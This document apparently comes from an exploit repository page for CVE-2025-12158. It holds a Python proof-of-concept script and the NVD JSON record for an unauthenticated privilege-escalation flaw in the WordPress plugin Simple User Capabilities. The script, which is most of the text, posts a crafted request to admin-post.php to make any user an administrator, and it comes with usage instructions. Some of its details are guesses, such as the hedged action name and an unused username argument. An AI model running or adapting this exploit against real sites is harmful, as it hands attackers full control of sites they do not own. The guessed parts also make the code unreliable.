CVE-2025-12158

import requests import sys # CVE-2025-12158 PoC - Simple User Capabilities Plugin Privilege Escalation # Target: WordPress site with Simple User Capabilities plugin <= 1.0 def exploit_privilege_escalation(target_url, target_user_id, admin_username): """ Exploit the privilege escalation vulnerability in Simple User Capabilities plugin. This allows unauthenticated attackers to grant administrator privileges to any user. Args: target_url: Base URL of the WordPress site target_user_id: ID of the user to escalate (usually 1 for admin) admin_username: Username to set for the admin role """ # Endpoint for submitting capabilities (typical WordPress admin-post handler) exploit_url = f"{target_url}/wp-admin/admin-post.php" # Payload to grant administrator capabilities # The plugin allows setting arbitrary capabilities for users data = { 'action': 'submit_capabilities', # or plugin-specific action name 'user_id': target_user_id, 'suc_capabilities': 'administrator', # or set specific caps 'role': 'administrator', '_wpnonce': '' # May not be required due to missing capability check } print(f"[*] Target: {target_url}") print(f"[*] Targeting user ID: {target_user_id}") print(f"[*] Setting role to: administrator") try: response = requests.post(exploit_url, data=data, timeout=30) if response.status_code == 200: print("[+] Exploit sent successfully!") print("[+] The user should now have administrator privileges.") print("[+] Verify by logging in as the target user.") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") sys.exit(1) if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-12158.py <target_url> <user_id> <admin_username>") print("Example: python cve-2025-12158.py http://example.com 1 newadmin") sys.exit(1) target = sys.argv[1] user_id = sys.argv[2] admin_user = sys.argv[3] exploit_privilege_escalation(target, user_id, admin_user)

{"cve": {"id": "CVE-2025-12158", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:10.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Capabilities plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the suc_submit_capabilities() function in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to elevate the role of any user account to administrator."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/simple-user-capabilities/tags/1.0/user_access.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-user-capabilities/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dd75b8ec-1961-4a7a-92e6-1517e638974b?source=cve", "source": "[email protected]"}]}}